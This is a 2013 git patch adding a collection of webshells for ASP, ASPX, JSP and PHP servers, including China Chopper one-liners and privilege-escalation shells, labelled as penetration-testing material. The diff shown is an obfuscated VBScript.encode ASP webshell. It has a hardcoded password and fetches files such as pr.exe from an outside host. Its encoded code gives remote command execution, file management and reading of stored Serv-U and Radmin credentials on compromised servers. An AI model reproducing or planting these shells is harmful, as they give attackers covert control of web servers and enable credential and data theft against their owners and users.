From 733618bc2af552af93c626821974769f0ea503d5 Mon Sep 17 00:00:00 2001 From: tennc Date: Fri, 24 May 2013 08:23:49 +0800 Subject: [PATCH] update webshell Penetration testing2013 beta --- asp/ice.asp | 19 + asp/vps提权马.asp | 1295 +++++++++++ asp/不灭之魂.asp | 1355 ++++++++++++ aspx/icesword.aspx | 2578 ++++++++++++++++++++++ caidao-shell/404.php | 1 + caidao-shell/aspx.jpg | Bin 0 -> 9976 bytes caidao-shell/download 下载文件.asp | 11 + caidao-shell/fuck.php | 1 + caidao-shell/guo.php | 1 + caidao-shell/hkmjj.asp | 22 + caidao-shell/ice.asp | 2 + caidao-shell/ice.aspx | 2 + caidao-shell/ice.cfm | 27 + caidao-shell/ice.jpg | Bin 0 -> 9023 bytes caidao-shell/ice.jsp | 59 + caidao-shell/ice.php | 1 + caidao-shell/mdb.asp | Bin 0 -> 233472 bytes caidao-shell/php.jpg | Bin 0 -> 8039 bytes caidao-shell/说明.log | 86 + jsp/icesword.jsp | 1808 +++++++++++++++ jsp/suiyue.jsp | 993 +++++++++ jsp/t00ls.jsp | 3294 ++++++++++++++++++++++++++++ other/icesword.war | Bin 0 -> 11470 bytes php/404.php | 38 + php/icesword.php | 2720 +++++++++++++++++++++++ php/itsec.php | 1284 +++++++++++ php/silic.php | 2210 +++++++++++++++++++ php/spy.php | 2136 ++++++++++++++++++ 28 files changed, 19943 insertions(+) create mode 100644 asp/ice.asp create mode 100644 asp/vps提权马.asp create mode 100644 asp/不灭之魂.asp create mode 100644 aspx/icesword.aspx create mode 100644 caidao-shell/404.php create mode 100644 caidao-shell/aspx.jpg create mode 100644 caidao-shell/download 下载文件.asp create mode 100644 caidao-shell/fuck.php create mode 100644 caidao-shell/guo.php create mode 100644 caidao-shell/hkmjj.asp create mode 100644 caidao-shell/ice.asp create mode 100644 caidao-shell/ice.aspx create mode 100644 caidao-shell/ice.cfm create mode 100644 caidao-shell/ice.jpg create mode 100644 caidao-shell/ice.jsp create mode 100644 caidao-shell/ice.php create mode 100644 caidao-shell/mdb.asp create mode 100644 caidao-shell/php.jpg create mode 100644 caidao-shell/说明.log create mode 100644 jsp/icesword.jsp create mode 100644 jsp/suiyue.jsp create mode 100644 jsp/t00ls.jsp create mode 100644 other/icesword.war create mode 100644 php/404.php create mode 100644 php/icesword.php create mode 100644 php/itsec.php create mode 100644 php/silic.php create mode 100644 php/spy.php diff --git a/asp/ice.asp b/asp/ice.asp new file mode 100644 index 0000000..563cc91 --- /dev/null +++ b/asp/ice.asp @@ -0,0 +1,19 @@ + + +<%@ LANGUAGE = VBScript.encode%><% +Server.ScriptTimeout=999999999 +UserPass="icesword"' +clientPassword="whoamI"' +mNametitle="ʹ"' +Copyright="ʹ"' +SItEuRl="HTTP://baidu.com/"' +bs=false' +ShowFileIco=true' +IcoPath="http://lpl38.com/web/FileType/"' +htp="http://lpl38.com/web/"' +durl="http://lpl38.com/web/pr.exe"' +aspxt="http://lpl38.com/web/aspx.txt"' +phpt="http://lpl38.com/web/php.txt"' +#@~^CHEBAA==]/2Kxk+R~E6W+MPxYMEn@#@&rx,3DMWD,]n/!:PH+aO,@#@&/D.AzfxE@!/m.raY~VmUTECT+{\4kmMrwDP.E lOxk+D7nD@*J@#@&dOD~bG'dY.$zf'J&WP"+5;/YcErJ'm^rxOhlk/hKD9'JrJb@!@*JEErPK4nx,?+kdrW `rJ:JEb{In;!n/D`EEr[msrxOnmdkhGMNLJJr#r'.(1nhdkUn@#@&/D.Azf'kO.AzfLJ(0~j/dkKU`rJ:Er#@!@*ErJEP:4x~A6mED+vj+k/rW `EE[JJ*bJ@#@&/D.$bG'kY.A)9LJ@!zk^DbwO@*rd@#@&/KxdY,9A0[{Jr@#@&kE(~?4WA2MDcb@#@&P,(0,2DM~Ptx@#@&%J@!8M@*@!l,4D0xvNl\Cd1DrwDl4kdDWMXR(l1V`*B@*@!(D@*~rP[,3DMRfd^DbwDkGx~',J@!zm@*@!(D@*E@#@&2..cZs+m.=InkwKx/RwsEkt@#@&,P3U9Pq6@#@&xN,d;4@#@&UE8P%ckY.#@#@&D/2G /+ AMkO+vdDDb@#@&AxN,?!8@#@&s;x1YrG PIKlDt`Ub@#@&,P"+KlO4{Inw^Cm`jSr-JSE'-E#@#@&Ax[,s!xmDkKU@#@&s;x1YrG PI"nnmYtvjb@#@&P,I]+KCDtxI2VmmncU~Jwwr~E-rb@#@&3 N,sE mDrW @#@&j"Sx];EdYc?+M-nDjlMkC4snk`Ej"JJ*@#@&6}rrx];;+kOc?nM\D.mDbC4^+d`rn)P_{K")1USb:39J*@#@&?nD-nMqK'"n;!+dOc?+.-D#lMrm4s/vJS}ZzJ{zf9Ir#@#@&zmYbGx{I+$;n/D`rb^YrG Jb@#@&]WKYKCDt'jnM\nDc\mwKmY4`JcJ*@#@&q IKWOxU+D7nDcHlaKCY4`rzE#@#@&wWsN.nmY4x"+;;nkYcJwG^NnMnmYtr#@#@&/D-+MEx];EdYc?+M-nDjlMkC4snk`EtDOw|tGdDJ#@#@&k+.\.a';k+Mwlk/@#@&sglh+{In5!+/DcJw1lsnE#@#@&wEUmOrKx~?4r?mxo; `?4rUlUr(%kY.*@#@&?tb?mUr(LdYMPx~"+w^Cm`?4rjl r(LdY.S,JE~,EJrJb@#@&sW.~Utr?mU&Px,F,KW,SU`Utr?mx68N/YMb@#@&Pq6~\k9`Utr?CU}4%/D.~,?4rUlx(S,FbP@!@*,JE,K4+x@#@&U4kUlU1hjOMP',\k9`?4rjl r(LdY.S,?4kUCx&~~q*P_~j4kjl HhjDD@#@&PAVkn@#@&?4kUlUHh?D.P{P\(/.S6P3PjtrjmxH+SjYM@#@&~AxN~(6@#@&1aD@#@&Utb?l s!UP{Pjtb?CUg+hUOD@#@&2 [~s!x1YrWU@#@&m[6{E@!DD@*@!DNPr[{N~hb[DtxO*,WxtW!d+}\nD{JEO4k/cdYHV+c8Cm0oMW;x[/KVGD{vaZ!fZ!BEE,WUHK;k+6!Y{JJDtbdRkYzVR8C13oMGE NZKsGD{B[!T&TTZBEJ@*E)16[xr@!0GUDPWl1n{BAbxTNk okv@*R@!&0KxO@*r)+6xJ@!zl@*@!&Y9@*@!zOD@*E@#@&d+D~0kWxdD\n.cZ.+mOr8N+1Y`r?1.kaYrxTRor^+?HdY:r(%nmDJ*@#@&/nO,0dWox/D-nMRZ.nmYnr(%mOvJUmDbwDrxTRok^+jzkY+s64N+mDEb@#@&/DDq'E4DY2)J&JLIn5!+/O U+.\.jl.bl(V+k`rj2".3I|1ChJ#L~V0Yv]n;!+kY ?n.7+..m.km4snk`Ji]dJb~&UkY."+7`I;!n/DRj+M\n.jlDbC4^+/vEiIdJ*~EzEb*)$l1VjMVxE@!4D@*@!(D@*@!1n YnM@*@!lP4DW'ELC\m/^.bwY=4kkYWMz 4mm0`bB@*@!Jl@*@!J^+ Yn.@*J@#@&%r@!4Yss@*@!hYmPtDYaR+$Er\{JE/KxYUY KXanEJ,mKxO+UO{JEYaYJtOh^iP^4mDd+DxT4+2FyJJ@*@!DrY^+@*JL:HCs+YbOV[J,R~JL?D-+.(h[EP@!&YbYsn@*@!/Oz^+~YH2'ErY6YJmkdJr@*8W9XSOM~Y9`:mDobURYKw=*26I8mmVoMGE NR^KVW.l[!T!ZTZi^KVKD)[&2osZ!I0KxORkkylFyw6pj/I}SdA)IRozZ3O;6S}Il:Z!!TTZidmMG^V8mD lDMWSRmKVGD=affws!ZI/1DW^s8lMO4kLtsrTtOO1GVKDl:Z!vfTZidmMG^V8mD &N^kT4Y mGVKDl:2&swT!p/mMGsV(lMOdtC[KhRmKsWM):f2ssTT)Rd4P^!DdKD=tl N)rxaEO~k+sn1Y~Dn6DlDC`4KD9+.OOGaOAk9Ot=F2ap0WUO hnkT4D)~(W^Ni(WM[+MOs+6YRAbNY4lP8w6pWGxDOkk"+lq8wai(GD9+.R^+0OR1WsWMl,af2sw!!p4m^3TDGE Nl~[!!ZT!Zi4K.[+MO(WOYGh hrND4),F2ap4W.[DR4KODWh mKVWM),:&2so!Zi^G^WD=~a2&swTTi(WMNnDROKwRmKsWM)~:2&soTZiWW O 0Csk^X),\.NmxCi(W.[DOMro4YOSr[Y4),F26I8KD[+MRDbo4O mWsGM)~a2fwsTZi)aNP4m^3TDGE Nl~[!!2T!Ziwm[[k o Vn0OllwaiaCN9kUL DkL4D)XwXNaDnP0KxY /b"+=PqFa6IWKxY WlskVHl~\D9lUlI^KVGD=~a2&ooZ!iN4M ^W^GM)~[&2ssZ!p8l13LDKEU[ mW^GD=Pa2fosZ!ptnkL4D)~*aai)aa`6WxOR6lhk^z=P-D9lxmi6GxDOdk.+lq2w6)C 1WVK.la2&wsT!IO6OO9nmKDCObWxlUKxni) m:`1W^WD=amClp0GxDOdr.+)8qwXi8@!&dYHV@*E@#@&r6P8/{OD!+~O4+xl%r@!dmMraY~kD1'JLtD2[rF Lk@*ElV/lLr@!/1.rwD@*r)nx[~b0lLrWE mOrKxPVr^V3DMGM/c* M+Y!D ~YMEni)hrU9WhcGxDDK.x3bV^2.DG.kiWE ^YbWU~H+/GVv#`k6~vmG 0bD:vJrȷҪִд˲EJ*#.+DE.U,YD!niV/~.+DEMx~0Csk+I86;x1YrG PD;U;VGm0c* O4+:k:P{~hbx[WSRdnDKksnW!Y`rE.E Z^W^3cbrJSP8T!*i-CMPYG[mX~',Uh~GlD+`*i7CD,Nr/aVCz{PYK[lHRYKJGmmV?ODrUT`biSrx9WA kYlO;k'EJr';W2HDbotD[r~P OEJ3NrdaVlHI8MEx;sGm0`*iWEU^DkGx,jtKhoG^N+.cwWsN.* OKwclN9D6GDsRoW^Nn.hlY4 \mVE~xPwW^NnDIOKw l9[D6W.hc/E8hbYc#pN6EU1YbWx,s!sVwW.:vsHCs+~w)mDkW b`YKwctrNnWKDhRwHls+ -mVEn~{Po1mhir6`wbmDkKU'{JEZKwzobV+rE#Pf1mhnP{PaDG:2OvJE븴ƵĿļȫJrSsglhn*iYG2ctrNWKDhcsgl:R7CV!+~_{PEE-uu-EJ3f1mhni)+^/nPrWvs)mDrW 'xErHW-nwks+rE* 9gls+P{Pa.WswO`rJƶĿļȫEEBs1mh+*iYK2 tbN0GDh w1C: \mV;n,_'~Eruku-Er_9gls+i)+^d+,kW`wb^ObWx{xJrZWazoW^NDEJb`G1C:~',w.GswYcErƶĿļȫJE~wHm:n*iDWwctb[+6W.:csHCs+R7CV!+P3x~Jru-ukJEQG1C:I8Vdn,k0cozmOkKU{'ErHK\+wW^[+MJE#PfHCs+P{~wMW:aOcJrƶĿļȫJr~o1Ch#IYK2R4k[n6WDh w1C: 7ls!+,_',Jrku-uEJ3fHCs+i)nVk+PbWcszmDkGxxxrJH+SoW^Nn.rJ#`9glh+,x,w.K:aY`rJҪ½ļȫrE~w1C:#IOKwR4rN0WMh sgls+ \Cs!+~',91m:nI)+VdnPfHlsn,'~rJ}YtDrEi)kW`G1Ch"' ;V^# DG2R4k9+WW.hcb^YbGxc\Cs!+Px~wb^YbG iOKwctk9+6GDsRdE(:rOv#i)nVk+ DG2R4k9+WW.hcsHlsnR7ls;P'~ErJEi)N@!zd1DbwY@*J@#@&Lr@!8W9XE~=q0,)mDkW xEJ,Y4+UP%~rPdmMGV^'UGr)L~E@*J@#@&GrsP6(KvF%B *ls ')mDkGU=r4:c!B!#,x~JUmMk2YrUTRok^n?H/Onsr4%n1YE)}8:`TB *P',J,~P,PE)}4Pc8~!*~',Jhk^.kaYc/4+ssr)64:cFB b~{PJִSʾv@!0GxD~1WsKD{D+9@*@!&0KxO@*Eʱ@!C~4D+6xBQbmDrGx{msNaB~OmDL+DxBwksnwDlhnE@*~@!6G Y~1W^WD{D[@*,ִZhN@!zWG Y@*@!&l@*P˹ִJ=68Kv B!bPx~rb9ro ZmYCsKoJl6(Kc B+*Px,JzZZA?U~P,PE)}4Pc2~!*~',J9"6 9YAxLkUnr)64:c&B b~{PJ)/;2j?,ѹ~,PE=r(K`W~ZbP{PE?1Dr2DkxT fbmYbGUlMXr)64PcW~+#,xPrP~~,J)68:`X~Zb,'~rb9WN(R1Gx +^YbWUE=r4:c*B #,x~Jݿ,Pr)64Pc+~T#,xPrb[G94RjOM+C:rl}4PvvB #,',EPϴ,Jlr(Kc{B!#,xPr?W6O)DDkklU/ obVnjaE)}4PcF~ b~{PE?zRwksjaPļPϴ,J=64:`0~Z#~x,JSHWjaVWm[ jaVKl[srsJlr(P`R~+b,'PEƷ~ļ,ϴPE)}8:`1B!*P',JhnDkkO/cj2sKlNcqJ=r4:c1~y#,'~J)jhj2VKCN,ļPϴ~E=r4Pc8!S!*~{PExHmkVc?sOwtlrVr)68:`FZS *P',EBHmk^Pʼ~շPEl}4P`8q~Z#~x,JZ96gKjRgnSHCbVr)r(KvqFB bP{PEjtKn,~J=r4:cq B!*PxPEjsY2HmrVc?hOaHlrscFE)}8:`qy~y#P{Prj:Dw\lbV~~r)r(P`8&~Zb~',Jtk^DGdK0ORo\S_KPKr)r8PvFf~yb,'~rP,J@#@&r(P`8cS!*Px~rh/r'J1DkaO /4+^V FEl,P6ADcFW~+b,'PEAktԸE)}$:`ql~Z#P{Pr ?r[EZ"qKPc12: r"|J=~~r~YvFX~+b,'~J鿴ϢʱȨrlr~Kcq+~!b~{PE/4nr[E^VclwaVr'JbmCYbWUE=rADcF+~ *~xPr/4+E[Es^RCwaskr[E^mYkGU,sjrʱļԼִrl}APvFF~!*P{~JktE[r+ssclwasJLJk1COkKxcFE)6$D`qGB+#,'~Ekt+E'rVsRm2aVrr[rmlDkKUPıw?6ʱļԼִJ=r$PvF%BT#,'Prj4+^Vcjd+.dr)6ADcFR~+b,'PEɾUY +Xn,xnDFc+6ûJ@#@&sKD~k{!~PKPFRl?YP:xj+M\D Z.nmYnr(%+1Yc6(K`rSZ#b)&W,O+8cF 8!ZXP@!@*~2MD~P4+x=(/}4L{E~J=2^/n)(d}4%'r~J=2..cZVnCM)3x9~&0lU+DPK{1KOtbxL)}4Pcb~F*xqkr4NlH+XY=qWPoG^NnDhCY4@!@*ErPY4n )j+kdbWUvJwWV9+MKlDtE#{I]nhlY4csKVN.KlDt*)3x[~&0lq6~?/drKx`EoKV[+MKmY4r#{JJ,K4nx=sGV9+.KmYt{ hSIWKOl?/kkGxcEwWsN.nmY4E*'sGs9+.nmO4)3 N,k0@#@&@#@&@#@&@#@&s!x^ObWx,KmzxXS4nDcv#@#@&%E@!Nr\,CVboUxEm+UODv@*h^zxzStD+Ȩ,AbU汾@!JNr\@*@!WGM:P C:'BXWGDsB,:nY4G9'vwKdYE@*@!Om4Vn~Sk[Y4xE%TuB(WD9+MxBZB@*@!DD@*@!DNPSrNDt'EqT]E@*1kWļ)~@!JY[@*@!ON,hr[Dt'vqZ]v@*@!r w;DP l:'E2lDtvPDX2n{BYaYEP\ms;+{B;)wfG^!:nxDdPmx[~U+YOr od-zs^Pik+M/-zwask1lOkKx~9mYl'w?H:l Onm'w1bUXA4Dn-;rY:2scmkWv,/ryxE%TE@*@!zY9@*@!ON@*@!rxaEO~DXwxBkE4srOB,\mV;+xv,ύPv@*@!&Y9@*@!&Dl4sn@*J@#@&U9Po!x1YkKx@#@&Lr@!&0KDh@*@!/mMrwD@*0!U^YbW P]jHG msk1V`* [G1E:nUDRa0K.sR^4k lR lsnP{P2lM+UOcwh9 \mVEI[W1Es+UY a6W.:cCmDkGU,'P2CM+UYc;MV 7l^E+pNK^Es+UYc6WGM:Rk;4skYvbI8@!zkm.k2O@*J@#@&w;x1YrG P?O.lhSKC9s.K:wkV`kKlDtb@#@&frh,W?D.+m:@#@&jnY,WUY.+Ch,'~?.\D /M+lOn}4%+1OvJ)9W94RUYMnlsJb@#@&rO4PWUODl:@#@& KHwPxPq@#@&R\W9nP{Pf@#@&Rr2n @#@&RdGmNoMWssk^+vdnmY4#@#@& KK/kDrW P',T@#@&UYM+C:JGmNoDKhsbVn~{PR]nmN@#@&c/^Wd@#@&2x9PqrY4@#@&?Y~GUYDC:,'PgGOtbxT@#@&2U[,s;x1OkKx@#@&wEx^ObWUP4nXNn1`kYDbx*~@#@&fr:,kS~N~P0SPM+/!sOP@#@&M+dEsO,'~!,@#@&wW.~bP'~q,KGPdn `dDDbx#,@#@&(0,HrNv/O.bx~,r~,F#,x~J6J,r.P\r9`dYMrxBPrS,F#~xrsEP:4x~@#@&,LP{P8XP@#@&3x9P(W,@#@&&WPtkNvdODbxBPr~~q*PxPrnJ,r.~tkNcdDDrxB~b~~8#,'Pr2r~K4+UP@#@&~%,'P8*P@#@&2 [~q6P@#@&(0~\bNc/D.k ~~rBPFb~{PENr~}D~tk9`/DDbU~,kSP8#~x,Jfr~K4+x,@#@&PNP{Pq&~@#@&2UN,(0,@#@&(6PHr[v/ODbUBPrBP8#P{Pr^J,r.Ptk[ckYDbU~,k~,qbP{PrZEPP4x~@#@&~L,'~qyP@#@&3 N~q6~@#@&(6PtkNv/D.k ~~kBPqb,'Pr8J,rD,\rNv/DDrxS~b~~F*~',J$E,KtnU,@#@&PN~{Pq8P@#@&2 N,(0,@#@&q6P\r9`/D.k ~PbS~F*P{PElE~}D~Hb[`kY.r ~PrS,FbP{~rbE,K4+x,@#@&~L,'~FZP@#@&AxN,(0,@#@&&W~HbNv/ODrUBPr~,q#,@!x~r,J~) N~Hb[v/OMk ~Pb~,q#,@*xPr!E~:t+ ~@#@&PL,x~Z&xD`\k[ckY.k SPb~~q*#P@#@&Ax[P&W,@#@&wWMP3,',qP:W~SxcdDDk bP Pk,@#@&PNP{P%PM~8v~@#@&H+XY~@#@&D+d;^Y~',./;^Y,_PNP@#@&16OP@#@&4nXN+1~',D+k;sY,@#@&2UN~o!x^YbGx,@#@&o!xmOrKx~n1) XA4+M+`9lDC~sW[+*@#@&uz?C{~HbN`9COlB&*@#@&qW~sW[+,xPrwCdkJPP4x~x!h(+.,',& =P;r0 EhP{Pq*W@#@&&WPsWN~xPrEk+.J~P4+UP ;:(+.~{P&Tl,Zr0 ;sPx,Fl@#@&wWM~k,'~F,KG~ E:(nD,?Y2~ ,@#@&w^/O.{`ctaNmc\bN`[CDlSkB+*#~XWMPt69nmvHrNvtCd4~kB+#*#PXG.P;k6x;:b@#@&qWPvcw1/O.,@!'~fy#~rM~vw^kYM@*FyG*bP:tnx,2arDPsK.P@#@&N^GNP{P[+^G9+~_,/tM`2^kYDb@#@&Zr0 ;s'/b0 E:3F@#@&16OP@#@&K^zxXS4+M+'9n^W9+@#@&3x[~6EUmDrW @#@&o!xmOrKx~4bUytnX`(kxkYMb@#@&sGD,k~x,FP:GPd+x~c8k /DDb@#@&46dYM~',Cnavb/^$vHrN~c(kUkYM~Pb~,q#*#@#@&&0~Jx`4n6kYD*xqP:tx~@#@&8bx+ta'(kU+4+6'EZJ'`d/m/nvt6/DD*b@#@&2s/@#@&8bx 4n6{4k +4+X[,S/ldnvtn6kOD*@#@&3 NP(W,@#@&1aD@#@&Ax9Ps!x1OkKx@#@&;qo~{PI5E/YvE2lDtr#@#@&(W,Z(s,@!@*,JE~:t+U~@#@&$k jDDxUYM+lsSKCNwDG:wksnvZqwbP@#@&LrK^l XStnDn~"+CN.P{'@*@!(D@*@!8M@*Kb:u=J';qw[J@!4M@*ʺ)r[KmzxzA4+D~`tkNv8rxyt6cArUUY.#B1FO~**~J;dDE#@#@&NJ@!(D@*)JLn1)xHh4+M+~ctkNv8k tacAbxUY.#Sq8G{~2+#BJ2Ck/Jb@#@&2UN,(6P@#@&s!xmDkKUPMl[:bxcb@#@&?OPq?C{~j+M\D Z.nmYnr(%+1YcEq?Z](hK ?_3dSE*@#@&Il9:bUnmY4'rCF3I{S}/bd{Hz/uqg2'?e?P3t-]b9hk --+c!-jnM\nD'KmDCs+D+Dk-r@#@&hl.ls+OnM'JhCDm:+Dn.J@#@&hW.Y~x,JKWMOJ@#@&%E@!4D@*עl_bjCֵ"C9:r Cm/t߻KNӣصַ=E[4Y2[r/GWDzIm[:bx{4CdtcDmD@!4.@*@!4.@*r@#@&hl.Cs+Yn.zD.lHxq?ucIAMIAbGcImNhk nCO4P[,KlMl:OnD,#@#@&%PKCMlh+DnDLJlE@#@&qW~&/)DMCH`KmDm:+D+M)DMlz#,K4n @#@&wGD,kP{~TP:W,j$W;U9`KlMC:Yn.zDDCz*@#@&q6~,Sn Pvt+X`hCDm:nYD).MlXvr#*#'8~Ptx,@#@&/O.}4%P{~/DD68NP[~EZJ'ZUOM`u6vnlMlsnYD)DMlzcb##*@#@&AV/@#@&/DD}4%Px~kY.r(%PLPunX`nC.m:nY.zD.mXvk#*@#@&3x9P(0,@#@&H6Y@#@&L,/YMG8L@#@&AVd+@#@&NJ3DMGDeP/C BY~]l["r@#@&2U9P&0@#@&Lr@!4M@*@!4M@*E@#@&nWMObMDlHx ?_R"2!I3)G`]l9hk nCO4P[~KKDOP*@#@&qW,qkbDMlHcnKDObMDCz*PK4nx,@#@&N~KWMY,[E)E~@#@&%P4n6DWrUD+Dc/UY.`_nX`KKDDbDMlHcF*#b[;?O.vC+XcnKDYz..lH`Z#b#b@#@&2s/~@#@&LE3MDW.Z,ZCxEO,InmNeJ@#@&2 [P&0@#@&Ax[~wEx1OkKx@#@&o;x1YbWUP4nXYGk O+M`dOMkxb~@#@&9ks~b~~N~,3~,DdE^Y~@#@&Dnd!VY,xPZP@#@&oGD,k,'~F~PKPJ+ c/DDrU*P@#@&(6P\k9ckY.bxBPkBP8bP{PE0rP6.,Hk9c/DDk S~kBP8#~'EorPPtUP@#@&%~{PFX~@#@&3x9~&0~@#@&&0Ptk9c/DDrxBPrS,F#,xPr+J,6.Ptk9`dY.r ~~kB~F*Px~r2J~P4+UP@#@&NPx,FWP@#@&2 [P&0~@#@&qW~tkNvdYMkxB~r~,F*PxPE[rP6D,\k9`dOMkxS~b~~F*~{PEGJ,Ktx,@#@&NPxP8&~@#@&2x9~q6P@#@&(WPtk9`dY.r ~~kB~F*Px~rmJ~6MP\k9ckY.bxBPkBP8bP{PEZrPP4xP@#@&L,'P8+~@#@&2 N~qW~@#@&(0,\k9`dOMkxS~b~~F*~{PE(J,rD,Hb[`kY.k ~~rBPF*~',JAr~Ptx,@#@&L~x,FqP@#@&2 N~(6P@#@&(6P\k9ckY.bxBPkBP8bP{PElrP6.,Hk9c/DDk S~kBP8#~'~EzJ~K4nx,@#@&%,'PqT,@#@&2 [,qW,@#@&q0,Hb[`kY.k ~~rBPF*~@!{PJOE~b N,HrNcdDDrxB~kBPqb,@*'~EZJ~K4n P@#@&L,'P;q O`tk[`kY.r ~PbSP8##,@#@&2 N,qWP@#@&wW.P0~',F~PKPSnUv/ODbU*PR,k,@#@&NP{~L,e~F+P@#@&g+6D~@#@&D+k;sY,',Dn/;sDPQPN~@#@&1naDP@#@&46OWbUD+.,',D+kE^OP@#@&3x9Po; mYbGx=sE ^OkKx,HCkUoKDh`*@#@&6n^!Y+cd4kdl W!xcr@*V4mYJ@!@*MY&@!@*NO&@!@*+sCD6kz@!@*vFE'M+[DG8:CD6~Bu!TqE'Y4Lb+4PEYZ!qE'4YNbh,v+^koFSW4j{xWbOmzgB{^./,B:CDon^koB{n:mx~nslDWr@!@*[Y@!@*9Y&@!@*:lM0b&@!@*BTB{Dn[MW4hlM0PEYX,E'DtLkn4,BY!ZqB{tO[bhPv; +\xbCt'UKkDmbQB{^DkPvY6+Jv{+:mUP:lMWr@!@*BZGqBx4DNrh,[Y@!@*.O@!@*DO&@!@*[YJ@!@*+s(lDz@!@*:MG0J@!@*DDz@!@*9Yz@!%)6kP9Un)0W{#;NrC(`UWbd//lb!D+-./'' rm:G9gJV/J4AzsW^RR&s2^zz=2YDt`LCwaYDtO+L'=¼E[km8ia/8ULiwd8 [Iwk8 [Ia/(x[pwk8xLLlxtO~0WP@*@!P*ENbC8` Wb/d+d~6kl@*m@!D/;s^b#Tqv@*v#'wkDnkj,VVz-'do kOY?~[ lPkOx:E1G9-');`.+[sKsAW4j)Dwr.1/l-CNBx0.4Phm'k/l^m,C@!,P~@*m@!n.thHUb1w#Oc@*B*+M+4hzUzm2-'^+DxChH?-wCDl9P GbYC1k^wwz-'qU/;V^lww8U+s;mKN-'l^`M+9VGsAG4?lYarD1/C-mLBxWD4PsC{/dmV1Pl@!iad4 [Iwk4U'pw/(U[@*l@!м^n.w*%v@*v#snMww-=^`M+[sKshG4U)Owb.1/C7lNB'6+M4Pslx/kls^,l@!@*C@!^;/k\bGv@*E#w-.n7Dn?,JpUPOWK/W.^bHw-kn^ko,:mDoKDhw-=ZcDNsGwhW4j)DwkM^dl7lNBx0n.4Phl{d/mV^~,l@!I2k4U[p2k4ULia/4 [p2/(x'ia/8ULiwk8xL@*l@!Kun*vv@*v#24a-w);cDNsGwhW4j=Y2kM^kl-mLE'0D4~:m'd/mV^~m@!iad4 [iad8xL@*m@!j69gq #lc@*E#j }f1( '-lZv.NsKsSWtU)D2kMmdl7l%v{0+M4Psl'kdCV1Pm@!Iwd8 [@*l@!b vj-.?#*c@*Bbj7.?w'/VkwPsCDTW.n'-l/vD+9sWwhW4jlYakMmdl-CNBx0.t,:Cxk/ls^,PC@!@*C@!#qvj7D+U#2c@*E#hW1ROWK?W rt"--knskwPsl.oG.h-w);cDNsGwhW4j=Y2kM^kl-mLE'0D4~:m'd/mV^~m@!iad4 [iad8xLia/8x'Ia/8xL@*l@!n\3:# cIa/8xLIa/8 [@*B#a:P-'? rG1( '-);cDNVKoAW4?=Y2k.^kl-lNv'6+.4,:lxdklsm,C@!@*C@!4!w:S#8c@*E#8Ea:Aw')Zv.+9VWwAGtU)DwrD^dm\CLEx0D4~sl'ddmV^Pm@!@*D8@!L=0k,N n)0Wx#kIKc Wkkd+k)@*Thrz@!@*LE.+-./'' rlsW[_JDw'2Dt''1.kPLsk@!iwk4 'L=xntDPVG,@*@!,b/"n` Gr/k+kPWkl@*m@!b-=n`"2J/IZ2]bZFc@*EbM+s1X1+D'-=n`M+[VKsAG4?)D2kMm/m-CLE'6+.t~hm'd/msm,l@!@*m@!#wl9`]2d/IZ3"#O`@*E#MnV1X^+M-wlG`D[VKshK4j)DwbD^/C-mLv'6nD4PhC{//Cs1PC@!@*C@!#w=ZvI2dZI/2"#0`@*Bb.VmH^+M--=/cDN^WohG4U)Owb.mkl-CNB'WnMt~:mxk/C^m,l@!@*l@!m̡#F`@*B*-ww'ˡʼ--k.+kjP^s)-'/TxrYOnUP[xm~/Dxnh!mW9w')/`Mn9VGwhKt?=YarD1/C\mLvx6+D4~:m'/kCsm,l@!@*C@!βmʼ_b+`@*B*w-ˡʼ'-d./j~s^bw-kL kOD+UPN l,dY +hE1W9w')Zv.+9VWwAGtU)DwrD^dm\CLEx0D4~sl'ddmV^Pm@!@*l@!kD/j|V^)#l`@*B*-wdM+/`~V^b-'dLxbYD+jP[UmPdY n:!mG9'-)/cM+[VKoSW4U)DwkMmkC\mLv'6+.4,:l{d/mVm,C@!@*m@!kYU+h;1W9#Wc@*E#dO +:;^Kfw-k./i,V^b-'/TUkDYn?,NUC,/Y n:!mWGww);`M+[VGoSW4?=OwbD^dm\l%v{0nD4~slxk/mVm,l@!@*l@!2hlMoG.h#&v@*B*/+^roPslMoGDKw')n`MnN^WoAKt?lOak.mkC7l%E'6+D4PsC'k/CV1PC@!@*l@!GhlMoWMKb v@*E#d+srwPhlMLWMnww=N`.n9VGsSG4?lDwbDmkl7CLE'W+Mt~hm'/kCV1Pl@!@*C@!slMoGDKb8`@*B*d+^ko~slDLGMnw-=/vDn9VKshKtUlYak.mkl-CNB'6nD4P:mxd/mV1PC@!@*.D@!@*+sCD6k&@!@*BFvxM+[DK8:CM0,B]Z!8v'DtLkt~vu!!8v'4YNbA~BVbsqhG4U'UWbOmzgvx1D/~v:CDwn^koE':l PhlM0r@!@*NO@!@*B W+cyca=[UEKDT3^l8v{+sXDdP8'4O9kh~[D@!@*ND&@!@*2J@!@*lz@!@*(&@!ʾ@*4@!@*[axWDt,vB{Xl^2dk9RVzYd *BsYEcN&X$O +:nsAYnocO +h!mKN'0mbsm W~l@!@*2@!@*lz@!@*4J@!@*(@!@*a['6+.t~vxGxExXmV2dbNRnsHYdR*v^YvvN&XADxh+^2O+TROU:E1GN{3mbs^xKPm@!@*Ba2y)Lxb[NmwvxVXOd,FxtD[bh~9Y@!@*NDz@!@*BZ!T!Z!:l9xEK.o0ml(vx+^XD/~Fx4DNrh,[Y@!@*[OJ@!@*nhmDWkJ@!@*BTE'M+NMW(n:mDWPE]TT8B'D4ob+t,vY!ZFE'4Y[rSPvE nH kC\{xWrO1b_B{^M/~EY6+SE'hl Pn:mDWr@!@*VDxNbPBZqB{tDNrh~[D@!@*BZv'Txr^mw/ssm~BZv{oUbN9lw^V^PEiT!Z!TT[PNbsWkP6aqlDNMW8Bxn^XO/,v]lRX1E'Y4Lb+4PEYZ!qE'4YNbh,nV(lO@!@*+s8mYz@!@*:MW0J@!@*DDz@!@*[Y&@!@*Bb`9CW^+. WkOC1WsRhmDoVbsB{31rV1xGPEˢBxn!Vl7~BDk:(;dB{+aXOPO;axr@!,@*B}MvxEVC-,BOks8!/v{+aXY,BDr:(EjB{+hC PY!2xb@!@*E.nY +1BxxLr^l~BZ*FE'4O9kh~[D@!@*ND&@!@*vL#4YlhD[VKscxKkdd?[Ex+!Vl7~v]Z!8)4Y[rSBx+^zYkPv4Dln.n9VGsEx:C PDEw k@!@*ND@!@*NDz@!ַ@*ED+DU+1B' 